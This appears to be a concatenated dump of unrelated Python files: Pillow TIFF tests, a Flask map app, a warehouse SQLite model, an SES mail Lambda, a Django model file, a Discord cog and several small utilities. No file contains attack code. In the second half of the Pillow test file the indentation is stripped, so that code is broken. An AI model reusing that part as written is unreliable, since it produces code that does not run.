            docker_run_cmd.append("start.sh")

        if args.verbose:
            print("Docker run command:\n{}".format(docker_run_cmd))

        self._run_docker_cmd(docker_run_cmd)

    def _run_docker_cmd(self, docker_run_cmd):
        """runs docker proc and exits on ctrl c"""
        # Run in its own process group so a Ctrl-C can kill the whole group.
        p = subprocess.Popen(docker_run_cmd, preexec_fn=os.setsid)
        try:
            p.communicate()
        except KeyboardInterrupt:
            os.killpg(os.getpgid(p.pid), signal.SIGKILL)
# Script entry point: construct the launcher and run the benchmark job.
if __name__ == "__main__":
    util = LaunchBenchmark()
    util.main()
| 1.492188 | 1 |
GUI/printer/Pillow-2.7.0/Tests/test_file_libtiff.py | y-gupta/rfid-auth-system | 5 | 12797248 | from helper import unittest, PillowTestCase, hopper, py3
import os
import io
from PIL import Image, TiffImagePlugin
class LibTiffTestCase(PillowTestCase):
    """Base test case for libtiff-backed TIFF tests.

    Skips all tests when Pillow was built without libtiff support and
    provides a shared sanity-check helper for G4-compressed images.
    """

    def setUp(self):
        # Skip the entire test case if the libtiff codecs were not compiled in.
        codecs = dir(Image.core)
        if "libtiff_encoder" not in codecs or "libtiff_decoder" not in codecs:
            self.skipTest("tiff support not available")

    def _assert_noerr(self, im):
        """Helper tests that assert basic sanity about the g4 tiff reading"""
        # 1 bit
        self.assertEqual(im.mode, "1")

        # Does the data actually load
        im.load()
        im.getdata()

        try:
            self.assertEqual(im._compression, 'group4')
        except AttributeError:
            # Narrowed from a bare `except:`, which also swallowed genuine
            # assertion failures (wrong compression) and KeyboardInterrupt.
            print("No _compression")
            print(dir(im))

        # can we write it back out, in a different form.
        out = self.tempfile("temp.png")
        im.save(out)
class TestFileLibTiff(LibTiffTestCase):
    def test_g4_tiff(self):
        """Test the ordinary file path load path"""
        # Known 500x500 G4-compressed fixture.
        file = "Tests/images/hopper_g4_500.tif"
        im = Image.open(file)

        self.assertEqual(im.size, (500, 500))
        self._assert_noerr(im)
    def test_g4_large(self):
        """A larger G4 fixture should still load without error."""
        file = "Tests/images/pport_g4.tif"
        im = Image.open(file)
        self._assert_noerr(im)
    def test_g4_tiff_file(self):
        """Testing the string load path"""
        file = "Tests/images/hopper_g4_500.tif"
        # Open from a file object rather than a path string.
        with open(file, 'rb') as f:
            im = Image.open(f)

            self.assertEqual(im.size, (500, 500))
            self._assert_noerr(im)
    def test_g4_tiff_bytesio(self):
        """Testing the stringio loading code path"""
        file = "Tests/images/hopper_g4_500.tif"
        s = io.BytesIO()
        # Copy the file into an in-memory buffer and load from there.
        with open(file, 'rb') as f:
            s.write(f.read())
            s.seek(0)
        im = Image.open(s)

        self.assertEqual(im.size, (500, 500))
        self._assert_noerr(im)
def test_g4_eq_png(self):
""" Checking that we're actually getting the data that we expect"""
png = Image.open('Tests/images/hopper_bw_500.png')
g4 = Image.open('Tests/images/hopper_g4_500.tif')
self.assert_image_equal(g4, png)
# see https://github.com/python-pillow/Pillow/issues/279
def test_g4_fillorder_eq_png(self):
""" Checking that we're actually getting the data that we expect"""
png = Image.open('Tests/images/g4-fillorder-test.png')
g4 = Image.open('Tests/images/g4-fillorder-test.tif')
self.assert_image_equal(g4, png)
def test_g4_write(self):
"""Checking to see that the saved image is the same as what we wrote"""
file = "Tests/images/hopper_g4_500.tif"
orig = Image.open(file)
out = self.tempfile("temp.tif")
rot = orig.transpose(Image.ROTATE_90)
self.assertEqual(rot.size, (500, 500))
rot.save(out)
reread = Image.open(out)
self.assertEqual(reread.size, (500, 500))
self._assert_noerr(reread)
self.assert_image_equal(reread, rot)
self.assertEqual(reread.info['compression'], 'group4')
self.assertEqual(reread.info['compression'], orig.info['compression'])
self.assertNotEqual(orig.tobytes(), reread.tobytes())
def test_adobe_deflate_tiff(self):
file = "Tests/images/tiff_adobe_deflate.tif"
im = Image.open(file)
self.assertEqual(im.mode, "RGB")
self.assertEqual(im.size, (278, 374))
self.assertEqual(
im.tile[0][:3], ('tiff_adobe_deflate', (0, 0, 278, 374), 0))
im.load()
def test_write_metadata(self):
""" Test metadata writing through libtiff """
img = Image.open('Tests/images/hopper_g4.tif')
f = self.tempfile('temp.tiff')
img.save(f, tiffinfo=img.tag)
loaded = Image.open(f)
original = img.tag.named()
reloaded = loaded.tag.named()
# PhotometricInterpretation is set from SAVE_INFO,
# not the original image.
ignored = [
'StripByteCounts', 'RowsPerStrip',
'PageNumber', 'PhotometricInterpretation']
for tag, value in reloaded.items():
if tag not in ignored:
if tag.endswith('Resolution'):
val = original[tag]
self.assert_almost_equal(
val[0][0]/val[0][1], value[0][0]/value[0][1],
msg="%s didn't roundtrip" % tag)
else:
self.assertEqual(
original[tag], value, "%s didn't roundtrip" % tag)
for tag, value in original.items():
if tag not in ignored:
if tag.endswith('Resolution'):
val = reloaded[tag]
self.assert_almost_equal(
val[0][0]/val[0][1], value[0][0]/value[0][1],
msg="%s didn't roundtrip" % tag)
else:
self.assertEqual(
value, reloaded[tag], "%s didn't roundtrip" % tag)
def test_g3_compression(self):
i = Image.open('Tests/images/hopper_g4_500.tif')
out = self.tempfile("temp.tif")
i.save(out, compression='group3')
reread = Image.open(out)
self.assertEqual(reread.info['compression'], 'group3')
self.assert_image_equal(reread, i)
def test_little_endian(self):
im = Image.open('Tests/images/16bit.deflate.tif')
self.assertEqual(im.getpixel((0, 0)), 480)
self.assertEqual(im.mode, 'I;16')
b = im.tobytes()
# Bytes are in image native order (little endian)
if py3:
self.assertEqual(b[0], ord(b'\xe0'))
self.assertEqual(b[1], ord(b'\x01'))
else:
self.assertEqual(b[0], b'\xe0')
self.assertEqual(b[1], b'\x01')
out = self.tempfile("temp.tif")
# out = "temp.le.tif"
im.save(out)
reread = Image.open(out)
self.assertEqual(reread.info['compression'], im.info['compression'])
self.assertEqual(reread.getpixel((0, 0)), 480)
# UNDONE - libtiff defaults to writing in native endian, so
# on big endian, we'll get back mode = 'I;16B' here.
def test_big_endian(self):
im = Image.open('Tests/images/16bit.MM.deflate.tif')
self.assertEqual(im.getpixel((0, 0)), 480)
self.assertEqual(im.mode, 'I;16B')
b = im.tobytes()
# Bytes are in image native order (big endian)
if py3:
self.assertEqual(b[0], ord(b'\x01'))
self.assertEqual(b[1], ord(b'\xe0'))
else:
self.assertEqual(b[0], b'\x01')
self.assertEqual(b[1], b'\xe0')
out = self.tempfile("temp.tif")
im.save(out)
reread = Image.open(out)
self.assertEqual(reread.info['compression'], im.info['compression'])
self.assertEqual(reread.getpixel((0, 0)), 480)
def test_g4_string_info(self):
"""Tests String data in info directory"""
file = "Tests/images/hopper_g4_500.tif"
orig = Image.open(file)
out = self.tempfile("temp.tif")
orig.tag[269] = 'temp.tif'
orig.save(out)
reread = Image.open(out)
self.assertEqual('temp.tif', reread.tag[269])
def test_12bit_rawmode(self):
""" Are we generating the same interpretation
of the image as Imagemagick is? """
TiffImagePlugin.READ_LIBTIFF = True
# Image.DEBUG = True
im = Image.open('Tests/images/12bit.cropped.tif')
im.load()
TiffImagePlugin.READ_LIBTIFF = False
# to make the target --
# convert 12bit.cropped.tif -depth 16 tmp.tif
# convert tmp.tif -evaluate RightShift 4 12in16bit2.tif
# imagemagick will auto scale so that a 12bit FFF is 16bit FFF0,
# so we need to unshift so that the integer values are the same.
im2 = Image.open('Tests/images/12in16bit.tif')
if Image.DEBUG:
print (im.getpixel((0, 0)))
print (im.getpixel((0, 1)))
print (im.getpixel((0, 2)))
print (im2.getpixel((0, 0)))
print (im2.getpixel((0, 1)))
print (im2.getpixel((0, 2)))
self.assert_image_equal(im, im2)
def test_blur(self):
# test case from irc, how to do blur on b/w image
# and save to compressed tif.
from PIL import ImageFilter
out = self.tempfile('temp.tif')
im = Image.open('Tests/images/pport_g4.tif')
im = im.convert('L')
im = im.filter(ImageFilter.GaussianBlur(4))
im.save(out, compression='tiff_adobe_deflate')
im2 = Image.open(out)
im2.load()
self.assert_image_equal(im, im2)
def test_compressions(self):
im = hopper('RGB')
out = self.tempfile('temp.tif')
for compression in ('packbits', 'tiff_lzw'):
im.save(out, compression=compression)
im2 = Image.open(out)
self.assert_image_equal(im, im2)
im.save(out, compression='jpeg')
im2 = Image.open(out)
self.assert_image_similar(im, im2, 30)
def test_cmyk_save(self):
im = hopper('CMYK')
out = self.tempfile('temp.tif')
im.save(out, compression='tiff_adobe_deflate')
im2 = Image.open(out)
self.assert_image_equal(im, im2)
def xtest_bw_compression_w_rgb(self):
""" This test passes, but when running all tests causes a failure due
to output on stderr from the error thrown by libtiff. We need to
capture that but not now"""
im = hopper('RGB')
out = self.tempfile('temp.tif')
self.assertRaises(
IOError, lambda: im.save(out, compression='tiff_ccitt'))
self.assertRaises(IOError, lambda: im.save(out, compression='group3'))
self.assertRaises(IOError, lambda: im.save(out, compression='group4'))
def test_fp_leak(self):
im = Image.open("Tests/images/hopper_g4_500.tif")
fn = im.fp.fileno()
os.fstat(fn)
im.load() # this should close it.
self.assertRaises(OSError, lambda: os.fstat(fn))
im = None # this should force even more closed.
self.assertRaises(OSError, lambda: os.fstat(fn))
self.assertRaises(OSError, lambda: os.close(fn))
def test_multipage(self):
# issue #862
TiffImagePlugin.READ_LIBTIFF = True
im = Image.open('Tests/images/multipage.tiff')
# file is a multipage tiff, 10x10 green, 10x10 red, 20x20 blue
im.seek(0)
self.assertEqual(im.size, (10, 10))
self.assertEqual(im.convert('RGB').getpixel((0, 0)), (0, 128, 0))
self.assertTrue(im.tag.next)
im.seek(1)
self.assertEqual(im.size, (10, 10))
self.assertEqual(im.convert('RGB').getpixel((0, 0)), (255, 0, 0))
self.assertTrue(im.tag.next)
im.seek(2)
self.assertFalse(im.tag.next)
self.assertEqual(im.size, (20, 20))
self.assertEqual(im.convert('RGB').getpixel((0, 0)), (0, 0, 255))
TiffImagePlugin.READ_LIBTIFF = False
def test__next(self):
TiffImagePlugin.READ_LIBTIFF = True
im = Image.open('Tests/images/hopper.tif')
self.assertFalse(im.tag.next)
im.load()
self.assertFalse(im.tag.next)
def test_4bit(self):
# Arrange
test_file = "Tests/images/hopper_gray_4bpp.tif"
original = hopper("L")
# Act
TiffImagePlugin.READ_LIBTIFF = True
im = Image.open(test_file)
TiffImagePlugin.READ_LIBTIFF = False
# Assert
self.assertEqual(im.size, (128, 128))
self.assertEqual(im.mode, "L")
self.assert_image_similar(im, original, 7.3)
def test_save_bytesio(self):
# PR 1011
# Test TIFF saving to io.BytesIO() object.
TiffImagePlugin.WRITE_LIBTIFF = True
TiffImagePlugin.READ_LIBTIFF = True
# Generate test image
pilim = hopper()
def save_bytesio(compression=None):
buffer_io = io.BytesIO()
pilim.save(buffer_io, format="tiff", compression=compression)
buffer_io.seek(0)
pilim_load = Image.open(buffer_io)
self.assert_image_similar(pilim, pilim_load, 0)
# save_bytesio()
save_bytesio('raw')
save_bytesio("packbits")
save_bytesio("tiff_lzw")
TiffImagePlugin.WRITE_LIBTIFF = False
TiffImagePlugin.READ_LIBTIFF = False
# Run the suite directly: `python test_file_libtiff.py`.
if __name__ == '__main__':
    unittest.main()

# End of file
| 1.6875 | 2 |
kontaktmap.py | muellermartin/kontaktmap | 0 | 12797256 | import os
from flask import Flask, render_template, request, json
app = Flask(__name__)
@app.route('/')
def index():
    """Serve the single-page map UI."""
    return render_template('index.html')
@app.route('/save', methods=['POST'])
def save():
    """Persist the posted JSON marker payload to data.json on disk."""
    payload = request.get_json()
    with open('data.json', 'w+') as f:
        json.dump(payload, f)
    return ''
@app.route('/load')
def load():
    """Return the saved marker data as JSON, or an empty marker list.

    BUG FIX: the file already contains serialized JSON text. Passing that
    string straight to ``json.jsonify`` double-encoded it, producing a JSON
    *string* ("{\\"markers\\": ...}") instead of the object itself. Decode
    first so the client receives the actual structure.
    """
    result = '{ "markers": [] }'
    if os.path.isfile('data.json'):
        with open('data.json', 'r') as f:
            result = f.read()
    return json.jsonify(json.loads(result))
# Run the Flask development server directly: `python kontaktmap.py`.
if __name__ == '__main__':
    app.run()
| 1.429688 | 1 |
elasticlog/customlogger.py | gustavohenrique/elasticlog | 1 | 12797264 | # coding: utf-8
import sys
import logging
import settings
# Shared log-line layout: timestamp, level padded/truncated to 5 chars, message.
logFormatter = logging.Formatter('%(asctime)s [%(levelname)-5.5s] %(message)s')
# Root logger: every getLogger(__name__) in the project propagates here.
logger = logging.getLogger()

# File output; the destination path comes from project settings.
fileHandler = logging.FileHandler('{0}'.format(settings.LOG_FILE_PATH))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)

# Mirror every record to stdout as well.
# NOTE(review): no logger.setLevel() is called, so the root logger keeps the
# default WARNING threshold — confirm INFO/DEBUG suppression is intended.
# Also, importing this module more than once adds duplicate handlers.
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
blaze/command/replay.py | henry1jin/alohamora | 5 | 12797272 | """ Implements the commands for viewing and manipulating the training manifest """
import json
import time
import os
from blaze.action import Policy
from blaze.logger import logger as log
from blaze.mahimahi.server import start_server
from . import command
@command.argument("replay_dir", help="The directory containing the save files captured by mahimahi")
@command.argument("--policy", help="The file path to a JSON-formatted push policy to serve")
@command.argument("--cert_path", help="Location of the server certificate")
@command.argument("--key_path", help="Location of the server key")
@command.argument(
    "--cache_time", help="Do not cache objects which expire in less than this time (in seconds)", type=int, default=None
)
@command.argument(
    "--extract_critical_requests",
    help="true or false to specify if server should inject critical request extractor",
    action="store_true",
)
@command.command
def replay(args):
    """
    Starts a replay environment for the given replay directory, including setting up interfaces, running
    a DNS server, and configuring and running an nginx server to serve the requests
    """
    # Resolve optional TLS material to absolute paths (None when not given).
    cert_path = os.path.abspath(args.cert_path) if args.cert_path else None
    key_path = os.path.abspath(args.key_path) if args.key_path else None

    # Load the optional push policy from its JSON description.
    push_policy = None
    if args.policy:
        log.debug("reading policy", push_policy=args.policy)
        with open(args.policy, "r") as policy_file:
            push_policy = Policy.from_dict(json.load(policy_file))

    with start_server(
        args.replay_dir,
        cert_path,
        key_path,
        push_policy,
        cache_time=args.cache_time,
        extract_critical_requests=args.extract_critical_requests,
    ):
        # Serve indefinitely; the loop only ends when the process is killed.
        while True:
            time.sleep(86400)
| 1.5625 | 2 |
backend/src/models/Warehouse.py | ahmedsalahacc/Inventory-Management-System | 0 | 12797280 | <filename>backend/src/models/Warehouse.py
from models import BaseModel, gen_id
class WarehouseModel(BaseModel):
    '''
    ORM for Warehouse table with the following structure

    warehouse(
        id CHARACTER(10) NOT NULL PRIMARY KEY,
        name TEXT NOT NULL,
        location TEXT NOT NULL
    );
    '''

    # ORDER BY directions accepted by getAll; anything else is rejected.
    _ALLOWED_ORDERS = ('ASC', 'DESC')

    def __init__(self, db_filename: str):
        super(WarehouseModel, self).__init__(db_filename)

    def insert(self, data_tuple: tuple) -> str:
        '''
        Inserts a new record in warehouse table

        Parameters
        ----------
        data_tuple: tuple
            tuple of values (name, location)

        Returns
        -------
        id: str
            generated id of the newly inserted record
        '''
        cursor = self.conn.cursor()
        sql_script = '''
        INSERT INTO warehouse VALUES (?, ?, ?)
        '''
        id = gen_id()
        cursor.execute(sql_script, (id, *data_tuple))
        self.conn.commit()
        cursor.close()
        return id

    def delete(self, id: str):
        '''
        Deletes a record from warehouse table

        Parameters
        ----------
        id: str
            id of the record to remove
        '''
        cursor = self.conn.cursor()
        sql_script = '''
        DELETE FROM warehouse WHERE id = ?
        '''
        cursor.execute(sql_script, (id,))
        self.conn.commit()
        cursor.close()

    def update(self, id: str, new_data: tuple):
        '''
        Updates a record of the warehouse table using id

        Parameters
        ----------
        id: str
            id of the record in the db
        new_data: tuple
            tuple of new values (name, location)
        '''
        cursor = self.conn.cursor()
        sql_script = '''
        UPDATE warehouse
        SET name = ? ,
            location = ?
        WHERE id = ?
        '''
        cursor.execute(sql_script, (*new_data, id))
        self.conn.commit()
        cursor.close()

    def getByID(self, id: str):
        '''
        gets a record from the warehouse table using id

        Parameters
        ----------
        id: str
            id of the record in the db

        Returns
        -------
        query: tuple
            represents the result (or None when no row matches)
        '''
        cursor = self.conn.cursor()
        sql_script = '''
        SELECT * FROM warehouse WHERE id = ?
        '''
        cursor.execute(sql_script, (id,))
        query = cursor.fetchone()
        cursor.close()
        return query

    def getAll(self, order: str = 'ASC'):
        '''
        gets all records from the warehouse table ordered by name

        Parameters
        ----------
        order: str Default = 'ASC'
            arrangement of the returned query
            ASC: ascending order
            DESC: descending order

        Returns
        -------
        query: list
            results list

        Raises
        ------
        ValueError
            if order is not 'ASC' or 'DESC'
        '''
        # SECURITY FIX: `order` is interpolated into the SQL text (keywords
        # cannot be bound as placeholders), so whitelist it to prevent SQL
        # injection via the sort-direction argument.
        order = order.upper()
        if order not in self._ALLOWED_ORDERS:
            raise ValueError("order must be 'ASC' or 'DESC'")
        cursor = self.conn.cursor()
        sql_script = f'''
        SELECT * FROM warehouse ORDER BY name {order}
        '''
        cursor.execute(sql_script)
        query = cursor.fetchall()
        cursor.close()
        return query
xps_convert/read/xmp_parser.py | InternetUnexplorer/XPSConvert | 0 | 12797288 | import re
from typing import Iterator
from xps_convert.read.errors import ParseError
from xps_convert.read.xmp import Xmp
FIELD_RE = re.compile(r"([\w\s]+):\s(.*)")
def parse_xmp(filename: str, lines: Iterator[str]) -> Xmp:
    """Parse ``key: value`` XMP lines into an Xmp, validating required fields.

    Raises ParseError for an unparseable line or a missing required field.
    """
    xmp = Xmp()
    next(lines)  # the first line is always a comment — skip it

    # Line numbers are needed for error reporting.
    for lineno, line in enumerate(lines):
        match = FIELD_RE.match(line)
        if match is None:
            raise ParseError("unable to parse line", filename, lineno)
        key, value = match.groups()
        xmp.values[key] = value

    # Verify that required fields are present
    for required in ("MHS File", "Device", "Package", "SpeedGrade"):
        if required not in xmp.values:
            raise ParseError(f"missing required field ‘{required}’", filename)
    return xmp
| 1.765625 | 2 |
class UserGroup:
    """Represents a user's membership in a group: row id plus group id."""

    def __init__(self, id=None, group_id=None,):
        self.id = id
        self.group_id = group_id
plot_bathymetry.py | sustain-lab/multibeam-em712 | 0 | 12797304 | import glob
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
import xarray as xr
from mpl_toolkits.basemap import Basemap
import gc
import matplotlib
matplotlib.rc('font', size=12)

# Directory of per-survey multibeam NetCDF files to render.
data_path = 'processed_netcdf'
multibeam_files = glob.glob(data_path + '/*.nc')
multibeam_files.sort()

# Monterey Bay bounding box and 0.1-degree graticule.
lon0, lon1 = -122.2, -121.7
lat0, lat1 = 36.6, 37.
parallels = np.arange(lat0, lat1 + 0.1, 0.1)
meridians = np.arange(lon0, lon1 + 0.1, 0.1)

fig = plt.figure(figsize=(8, 6))
# NOTE(review): `map` shadows the builtin of the same name.
map = Basemap(llcrnrlon=lon0, llcrnrlat=lat0, urcrnrlon=lon1, urcrnrlat=lat1, \
    resolution='f')
map.drawcoastlines()
map.drawparallels(parallels, labels=~np.isnan(parallels))
map.drawmeridians(meridians, labels=~np.isnan(meridians))

# Decimate each grid by this stride to keep plotting tractable.
skip = 4
for f in multibeam_files:
    print('Plotting ', f)
    ds = xr.open_dataset(f)
    lon = np.array(ds.longitude[::skip,::skip])
    lat = np.array(ds.latitude[::skip,::skip])
    depth = np.array(ds.depth[::skip,::skip])
    plt.pcolor(lon, lat, depth, vmin=0, vmax=100, cmap=cm.viridis_r)
    # Free the (large) arrays before loading the next file.
    del lon, lat, depth, ds
    gc.collect()

plt.colorbar()
fig.suptitle('Monterey Bay bathymetry from shipboard Multibeam EM-712')
plt.savefig('monterey_bay_multibeam_bathymetry.png', dpi=300)
plt.close(fig)
| 1.820313 | 2 |
tests/test_utilities.py | mhostetter/quaternionic | 40 | 12797312 | import sys
import numpy as np
import quaternionic
import pytest
def test_self_return():
    """type_self_return should wrap f1 so its plain-ndarray result is
    returned as a quaternionic array (with or without f1.nin set)."""
    def f1(a, b, c):
        d = np.asarray(a).copy()
        assert isinstance(a, np.ndarray) and isinstance(a, quaternionic.array)
        assert isinstance(b, np.ndarray) and isinstance(b, quaternionic.array)
        assert isinstance(c, np.ndarray) and isinstance(c, quaternionic.array)
        assert isinstance(d, np.ndarray) and not isinstance(d, quaternionic.array)
        return d
    a = quaternionic.array.random((17, 3, 4))
    b = quaternionic.array.random((13, 3, 4))
    c = quaternionic.array.random((11, 3, 4))
    # Unwrapped: result is a plain ndarray.
    d1 = f1(a, b, c)
    assert isinstance(d1, np.ndarray) and not isinstance(d1, quaternionic.array)
    # Wrapped: result is re-typed as a quaternionic array.
    d2 = quaternionic.utilities.type_self_return(f1)(a, b, c)
    assert isinstance(d2, np.ndarray) and isinstance(d2, quaternionic.array)
    # Setting nin exercises the ufunc-like wrapping path.
    f1.nin = 3
    f3 = quaternionic.utilities.type_self_return(f1)
    d3 = f3(a, b, c)
    assert isinstance(d3, np.ndarray) and isinstance(d3, quaternionic.array)
def test_ndarray_args():
    """ndarray_args should pass arguments to f1 as plain ndarrays and leave
    the return value a plain ndarray."""
    def f1(a, b, c):
        d = np.asarray(a).copy()
        assert isinstance(a, np.ndarray) and not isinstance(a, quaternionic.array)
        assert isinstance(b, np.ndarray) and not isinstance(b, quaternionic.array)
        assert isinstance(c, np.ndarray) and not isinstance(c, quaternionic.array)
        assert isinstance(d, np.ndarray) and not isinstance(d, quaternionic.array)
        return d
    a = quaternionic.array.random((17, 3, 4))
    b = quaternionic.array.random((13, 3, 4))
    c = quaternionic.array.random((11, 3, 4))
    f2 = quaternionic.utilities.ndarray_args(f1)
    d2 = f2(a, b, c)
    assert isinstance(d2, np.ndarray) and not isinstance(d2, quaternionic.array)
    # Same behaviour when f1 advertises a ufunc-like nin attribute.
    f1.nin = 3
    f3 = quaternionic.utilities.ndarray_args(f1)
    d3 = f3(a, b, c)
    assert isinstance(d3, np.ndarray) and not isinstance(d3, quaternionic.array)
def test_ndarray_args_and_return():
    """ndarray_args_and_return should pass plain ndarrays into f1 but
    re-type the result as a quaternionic array."""
    def f1(a, b, c):
        d = np.asarray(a).copy()
        assert isinstance(a, np.ndarray) and not isinstance(a, quaternionic.array)
        assert isinstance(b, np.ndarray) and not isinstance(b, quaternionic.array)
        assert isinstance(c, np.ndarray) and not isinstance(c, quaternionic.array)
        assert isinstance(d, np.ndarray) and not isinstance(d, quaternionic.array)
        return d
    a = quaternionic.array.random((17, 3, 4))
    b = quaternionic.array.random((13, 3, 4))
    c = quaternionic.array.random((11, 3, 4))
    f2 = quaternionic.utilities.ndarray_args_and_return(f1)
    d2 = f2(a, b, c)
    assert isinstance(d2, np.ndarray) and isinstance(d2, quaternionic.array)
    # Same behaviour when f1 advertises a ufunc-like nin attribute.
    f1.nin = 3
    f3 = quaternionic.utilities.ndarray_args_and_return(f1)
    d3 = f3(a, b, c)
    assert isinstance(d3, np.ndarray) and isinstance(d3, quaternionic.array)
@pytest.mark.skipif(sys.implementation.name.lower() == 'pypy', reason="No numba on pypy")
def test_types_to_ftylist():
    """The numpy ufunc type string '?bhilqpBHILQPfdgF->D' should convert to
    the equivalent numba signature list."""
    import numba
    types_to_ftylist = quaternionic.utilities.convert_numpy_ufunc_type_to_numba_ftylist
    types = '?bhilqpBHILQPfdgF->D'
    # Expected signature: one numba type per input character, complex128 out.
    ftylist = numba.complex128(
        numba.boolean,
        numba.byte,
        numba.short,
        numba.intc,
        numba.int_,
        numba.longlong,
        numba.intp,
        numba.char,
        numba.ushort,
        numba.uintc,
        numba.uint,
        numba.ulonglong,
        numba.uintp,
        numba.float32,
        numba.float_,
        numba.double,
        numba.complex64,
    )
    assert types_to_ftylist([types]) == [ftylist]
def test_pyguvectorize():
    """Every compiled ufunc in quaternionic.algebra_ufuncs should agree with
    the pure-Python version produced by pyguvectorize from the same source
    function, over scalar-like and array quaternion inputs."""
    _quaternion_resolution = 10 * np.finfo(float).resolution
    np.random.seed(1234)
    one = quaternionic.array(1, 0, 0, 0)
    x = quaternionic.array.random((7, 13, 4))
    y = quaternionic.array.random((13, 4))
    z = np.random.rand(13)
    # First-argument candidates, including near-identity edge cases.
    arg0s = [one, -(1+2*_quaternion_resolution)*one, -one, x]
    for k in dir(quaternionic.algebra_ufuncs):
        if not k.startswith('__'):
            f1 = getattr(quaternionic.algebra_ufuncs, k)
            f2 = getattr(quaternionic.algebra, k)
            sig = f2.signature
            # '(n)' marks a quaternion argument; otherwise pass the scalars z.
            inputs = sig.split('->')[0].split(',')
            for arg0 in arg0s:
                args = [arg0.ndarray] if inputs[0] == '(n)' else [z,]
                if len(inputs) > 1:
                    args.append(y.ndarray if inputs[1] == '(n)' else z)
                assert np.allclose(
                    f1(*args),
                    quaternionic.utilities.pyguvectorize(f2.types, f2.signature)(f2)(*args),
                    atol=0.0,
                    rtol=_quaternion_resolution
                )
| 1.40625 | 1 |
cogs/onload.py | paulranshaw/Discord-Bot | 0 | 12797320 | <filename>cogs/onload.py<gh_stars>0
import discord
import os
from discord.errors import ClientException
import dotenv
import logging
import asyncio
from discord.ext import commands, tasks
from dotenv import load_dotenv
from itertools import cycle
# NOTE(review): this module-level client appears unused — the cog receives the
# bot instance through setup() below; confirm before removing.
client = discord.Client()
class Onload(commands.Cog):
    """Cog that reports once the bot has connected and is ready."""

    def __init__(self, client):
        # The bot/client instance this cog is attached to.
        self.client = client

    @commands.Cog.listener()
    async def on_ready(self):
        # Fired by discord.py when the gateway session is fully established.
        print('Bot is online.')
def setup(client):
    """Extension entry point used by discord.py's load_extension."""
    client.add_cog(Onload(client))
service/models.py | YuraPogorelov/auto-blog-pyhon | 0 | 12797328 | <gh_stars>0
from django.db import models
from django.urls import reverse
# Create your models here.
class Category(models.Model):
    """Service category (translated from the original Russian docstring)."""
    name = models.CharField('Название категории', max_length=120)
    slug = models.SlugField('URL', max_length=120)
    text = models.TextField('Текст категории')
    banner = models.ImageField('Баннер', upload_to='images/', blank=True, null=True)
    # SEO metadata rendered into the page head.
    title = models.CharField('Title', max_length=120)
    description = models.CharField('Description', max_length=120)
    keywords = models.CharField('Keywords', max_length=250)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Resolved against the 'service_category' URL pattern by slug.
        return reverse('service_category', kwargs={'slug': self.slug})

    class Meta:
        verbose_name = 'Категория'
        verbose_name_plural = 'Категории'
class Model(models.Model):
    """A model/item belonging to a Category (translated from Russian)."""
    category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, verbose_name='Выбор категории')
    name = models.CharField('Название услуги', max_length=120)
    slug = models.SlugField('URL', max_length=120, default='', unique=True)
    text = models.TextField('Текст модели', default='')
    header = models.CharField('Заголовок', max_length=240, blank=True, null=True)
    sub_header = models.CharField('Подзаголовок', max_length=240, blank=True, null=True)
    images = models.ImageField('Картинка техники', upload_to='images/', blank=True, null=True)
    active = models.BooleanField('Опубликовать', default=True)
    # SEO metadata rendered into the page head.
    title = models.CharField('Title', max_length=120)
    description = models.CharField('Description', max_length=120)
    keywords = models.CharField('Keywords', max_length=250)
    # NOTE(review): unique=True combined with default=0 means a second row
    # created without an explicit sort value violates the constraint — confirm.
    sort = models.PositiveIntegerField('Порядок', default=0, unique=True)
    banner = models.ImageField('Баннер', upload_to='images/', blank=True, null=True)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # URL includes both the parent category slug and this model's slug.
        return reverse('service_model_view', kwargs={'category': self.category.slug, 'slug': self.slug})

    class Meta:
        verbose_name = 'Модель'
        verbose_name_plural = 'Модели'
.projectsAg/model/mail.py | Hraesvel/portfolioSite_flutter | 0 | 12797336 | <reponame>Hraesvel/portfolioSite_flutter
import json
import os
import boto3
from botocore.exceptions import ClientError
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# from email.mime.application import MIMEApplication
# AWS region for the SES client; raises KeyError at import time when the
# 'Region' variable is missing from the Lambda environment.
region = os.environ['Region']
def send_mail(msg):
    """Send *msg* through AWS SES and return a human-readable status string.

    Parameters
    ----------
    msg: dict
        expects keys 'reply_address' (the sender/reply-to address) and
        'body' (the plain-text message body).

    Returns
    -------
    str
        "Email sent! Message ID: <id>" on success, or the SES error message.
    """
    client_ses = boto3.client('ses', region)
    try:
        # BUG FIX: verify_email_address expects a string email address; the
        # whole msg dict was previously passed, which fails boto3 parameter
        # validation before any mail could be verified.
        verify = client_ses.verify_email_address(EmailAddress=msg['reply_address'])
        response = client_ses.send_email(
            Source='<EMAIL>',
            Destination={
                # TODO(review): all recipient lists are empty, so this mail
                # has no destination — fill in the intended ToAddresses.
                'ToAddresses': [],
                'CcAddresses': [],
                'BccAddresses': []
            },
            Message={
                'Subject': {'Data': f"from {msg['reply_address']}"},
                'Body': {'Text': {'Data': msg['body']}}},
            ReplyToAddresses=[msg['reply_address']],
        )
    except ClientError as e:
        output = e.response['Error']['Message']
    else:
        output = "Email sent! Message ID: " + response['MessageId']
    return output
def lambda_handler(event, context):
    """AWS Lambda entry point: relay the incoming event as an email."""
    result = send_mail(event)
    print(result)
    return {
        'statusCode': 200,
        'body': json.dumps('Hello from Lambda!')
    }
| 1.5 | 2 |
class MyList(list):
    """A list with 1-based positive indexing.

    Index 1 addresses the first element, index 0 raises IndexError, and
    negative indices keep their usual Python meaning.
    """

    def __getitem__(self, index):
        if index == 0:
            raise IndexError
        shifted = index - 1 if index > 0 else index
        return list.__getitem__(self, shifted)

    def __setitem__(self, index, value):
        if index == 0:
            raise IndexError
        shifted = index - 1 if index > 0 else index
        list.__setitem__(self, shifted, value)
# Demo of the 1-based indexing: x[1] is the first element; x[0] would raise.
if __name__ == '__main__':
    x = MyList(['a', 'b', 'c'])
    print(x)
    print("-" * 10)
    x.append('d')
    print(x)
    print("-" * 10)
    # Equivalent to x[4] = 'e' — writes the fourth (last) element.
    x.__setitem__(4, 'e')
    print(x)
    print("-" * 10)
    print(x[1])
    print(x.__getitem__(1))
    print("-" * 10)
    print(x[4])
